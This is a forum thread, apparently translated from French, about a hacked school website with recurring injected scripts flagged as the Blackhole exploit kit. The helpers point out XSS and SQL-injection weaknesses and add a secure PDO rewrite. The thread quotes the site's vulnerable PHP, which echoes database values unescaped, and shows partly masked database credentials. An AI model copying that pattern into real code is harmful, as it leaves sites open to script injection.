Site hacked: code injection

Closed
nbs28 - 31 Jul 2013 at 17:03
EGP-Swyx Posts: 6664 Registered: Sunday 18 March 2012 Status: Contributor Last seen: 7 January 2019 - 1 Aug 2013 at 09:15
Hello,

I built a site for my maths teacher so that he can upload files.

A month ago I suffered code injection attacks.

This week it is starting again.

AVG detects Exploit Blackhole Exploit Kit (type 2602).

Code has been inserted into all my js files.

On top of that, on my home page I have this:




PS: I know the site is ugly, it is under development.

What can I do, given that I have protected myself against SQL injection, the forms forward the message to an email address, and MS-DOS attacks don't work, I tested?

When I delete the code, it comes back.

Does anyone know what this code does?

For those who want to take a look, the address is http://milletvaldevoise.free.fr

4 replies

EGP-Swyx Posts: 6664 Registered: Sunday 18 March 2012 Status: Contributor Last seen: 7 January 2019 623
31 Jul 2013 at 17:06
I think this is more a web development matter, isn't it? (web programming?)

You should change the category and give it a more explicit title, something like
(security flaw, code injection)

Because from the title it looks like you are asking for a tutorial.
0
Malekal_morte- Posts: 180304 Registered: Wednesday 17 May 2006 Status: Moderator, Security contributor Last seen: 15 December 2020 24 627
Edited by Malekal_morte- on 31/07/2013 at 17:58
Hi,

This site is a worry: XSS, and there must be SQL injection too, seeing how you throw the variables around...
<?php
$req = mysql_query('SELECT content FROM classes WHERE actif=1') OR die('Erreur de la requête MySQL');
while($donnees = mysql_fetch_assoc($req))
{
// the database value is written straight into the href and the link text, with no escaping
echo '<li><a href="classe.php?classe=' . $donnees['content'] . '">' . $donnees['content'] . '</a></li>';
}
?>


You are going to get hacked again... one day, that's for sure.

<?php
$server = 'millet****.sql.free.fr';
$connexion = mysql_connect($server, 'millet****', 'boulot****') OR die('Erreur de connexion');
mysql_select_db('millet****', $connexion) OR die('Erreur de sélection de la base');
?>


0
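As an added example (not Malekal_morte-'s code nor the site's own), here is the listing quoted above rewritten so that a stored value can no longer break out of the HTML, together with a hypothetical classe.php that reads the parameter through a prepared statement. It assumes a PDO connection, the `classes` table with the `content` and `actif` columns seen above, and that classe.php looks a class up by name; the credentials are placeholders.

```php
<?php
// Added example, not the site's code. PDO replaces the mysql_* functions
// (deprecated in PHP 5.5, removed in PHP 7). Connection values are placeholders.
$pdo = new PDO(
    'mysql:host=DB_HOST_PLACEHOLDER;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
    'DB_USER_PLACEHOLDER',
    'DB_PASSWORD_PLACEHOLDER',
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_EMULATE_PREPARES => false]
);

// Escape a string for use inside an HTML text node or a quoted attribute value.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// index.php: list the active classes. The name goes through urlencode() for the
// query string and h() for the HTML, so a stored "<script>" in `content` is
// displayed as text instead of being executed in the visitor's browser.
$rows = $pdo->query('SELECT content FROM classes WHERE actif = 1')->fetchAll(PDO::FETCH_ASSOC);
foreach ($rows as $row) {
    $name = $row['content'];
    echo '<li><a href="classe.php?classe=' . h(urlencode($name)) . '">' . h($name) . '</a></li>';
}

// classe.php (hypothetical): the ?classe= parameter reaches SQL only as a bound
// value, never by string concatenation, so a crafted value cannot alter the query.
$classe = isset($_GET['classe']) ? (string) $_GET['classe'] : '';
$stmt = $pdo->prepare('SELECT content FROM classes WHERE content = :classe AND actif = 1');
$stmt->execute([':classe' => $classe]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

if ($row === false) {
    // Unknown class: respond with 404 and do not echo the submitted value back.
    http_response_code(404);
    echo '<p>Classe inconnue</p>';
} else {
    echo '<h1>' . h($row['content']) . '</h1>';
}
```

The same two rules apply to every other page of the site: escape at the point of output, and bind every request-supplied value instead of concatenating it into SQL.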
nbs28 Posts: 24 Registered: Wednesday 31 July 2013 Status: Member Last seen: 19 April 2014 75
31 Jul 2013 at 17:56
How were you able to see the PHP source code?
0
Malekal_morte- Posts: 180304 Registered: Wednesday 17 May 2006 Status: Moderator, Security contributor Last seen: 15 December 2020 24 627
31 Jul 2013 at 17:58
Because your site is a sieve.

Send me a private message and I'll explain, but there is a lot of work to do..
0
Injhall Posts: 3563 Registered: Friday 13 July 2012 Status: Member Last seen: 2 August 2013 1 016
31 Jul 2013 at 18:05
Quick question: why by private message?
This is a mutual-help forum, it could help other people solve similar problems ;)
0
Malekal_morte- Posts: 180304 Registered: Wednesday 17 May 2006 Status: Moderator, Security contributor Last seen: 15 December 2020 24 627
Edited by Malekal_morte- on 31/07/2013 at 18:08
there are also some real j*rks around :)
I'll copy/paste it once he has secured his site.
Otherwise it could let anyone reading this do whatever they want.
0
EGP-Swyx Posts: 6664 Registered: Sunday 18 March 2012 Status: Contributor Last seen: 7 January 2019 623
1 Aug 2013 at 09:15
+1 for the PM, I second that. You can post a log of the fixes applied afterwards, it's simpler.
0